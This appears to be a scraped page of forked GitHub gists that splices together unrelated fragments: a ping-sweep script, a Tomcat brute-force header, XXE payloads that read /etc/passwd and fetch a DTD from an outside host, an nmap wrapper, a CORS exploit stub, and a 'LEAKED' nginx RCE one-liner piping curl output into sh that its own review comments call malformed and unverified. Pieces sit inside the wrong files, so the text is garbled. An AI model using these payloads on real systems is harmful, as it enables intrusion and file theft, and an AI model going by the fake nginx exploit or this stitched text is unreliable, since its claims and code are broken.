
lib_mysqludf_sys_32.dll:
SELECT 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
trackscorer / pingscan.sh
Created December 19, 2022 07:14 — forked from blu3Alien/pingscan.sh
Shell script to scan a range of IP addresses. USAGE: ./pingscan 192.168.1.
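#!/bin/sh
# Ping sweep of one /24: probes <prefix>0 .. <prefix>255 in parallel and prints
# "<address> is Alive" for every address that answers.
# Usage: pingscan.sh 192.168.1.

# Abort with the usage text when the prefix is missing or empty.
: "${1:?Usage: $0 ip subnet to scan. eg '192.168.1.'}"
subnet=$1

# The prefix is pasted straight into ping's argument list, so accept only
# digits and dots. This keeps a value that starts with "-" from being parsed
# as a ping option and keeps spaces/globs out of the command line.
case $subnet in
  *[!0-9.]*)
    echo "Usage: $0 ip subnet to scan. eg '192.168.1.'" >&2
    exit 1
    ;;
esac

for addr in $(seq 0 1 255); do
  # NOTE: -t is not portable. Linux iputils ping reads it as the IP TTL,
  # macOS/BSD ping reads it as a timeout in seconds.
  # Each probe runs in its own background subshell; only successes print.
  ( ping -c 3 -t 5 "$subnet$addr" > /dev/null && echo "$subnet$addr is Alive" ) &
done

# Block until every background probe has finished, so all results are printed
# before the script returns and the output can be piped or redirected reliably.
wait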
trackscorer / index.html
Created June 21, 2021 10:46 — forked from darmie/index.html
base64ToArrayBuffer
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
<script id="jsbin-javascript">
LEAKED: Null-byte RCE overflow in nginx BLT/Stream
Nginx 1.x PoC one-liner:
# NOTE(review): read this line as shell before running it anywhere.
# - `| sh` feeds whatever the remote host returns into a local shell, so the
#   machine exposed by this command is the one it is typed on.
# - curl's -O takes no argument; `0x0238f06a#PLToffset` and the escaped
#   `\<'protocol:TCP'` are therefore parsed as additional URLs, not as an
#   offset or a protocol selector.
# - /dev/tcp/... is a bash redirection path, not a host/port argument for nc.
# Nothing on this page shows the claim being verified; treat it as untested.
curl -gsS victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Issue: https://github.com/nginx/njs/issues/159
trackscorer / tomcat_bruteforce.py
Created March 11, 2019 06:44 — forked from th3gundy/tomcat_bruteforce.py
Tomcat manager console bruteforce
"""
Tomcat bruteforce
Author: @itsecurityco
"""
import os
import sys
import getopt
import base64
import requests
<?xml version=”1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM “file:///etc/passwd”>]>
<data>&file;</data>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>
xxe.dtd:
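#!/bin/bash
# Interactive wrapper: asks for a target, prints the address ping resolved it
# to, then runs an all-ports nmap service/OS scan and saves the XML report.

# -r keeps backslashes in the answer literal.
read -r -p "Target IP/Hostname:" val
echo "$val"

# The answer becomes a positional argument of ping and nmap. Refuse empty
# input and anything starting with "-" so it cannot be parsed as an option.
case $val in
  '' | -*)
    printf 'invalid target: %s\n' "$val" >&2
    exit 1
    ;;
esac
ADDR=$val

# Take the first ping output line that mentions the target and print the text
# between its first pair of parentheses (the resolved address).
# grep -F matches the target literally instead of as a regular expression.
TMPSTR=$(ping "${ADDR}" -c 1 | grep -F -- "${ADDR}" | head -n 1)
printf '%s\n' "${TMPSTR}" | cut -d'(' -f 2 | cut -d')' -f1

read -r -p "Save scan as (XML):" file
echo "$file"

# -p- scans all TCP ports, -sV probes service versions, -O attempts OS
# detection (normally requires root privileges). -oX writes the XML report to
# the path exactly as typed and overwrites an existing file.
nmap -p- -sV -O "$val" -oX "$file"

# NOTE(review): url and ext are not used in the visible part of the script;
# presumably consumed further down - confirm.
read -r -p "Input url and ext:" url ext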
# cd /usr/local
# rm -f bin/nmap bin/nmapfe bin/xnmap
# rm -f man/man1/nmap.1 man/man1/zenmap.1
# rm -rf share/nmap
# ./bin/uninstall_zenmap
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>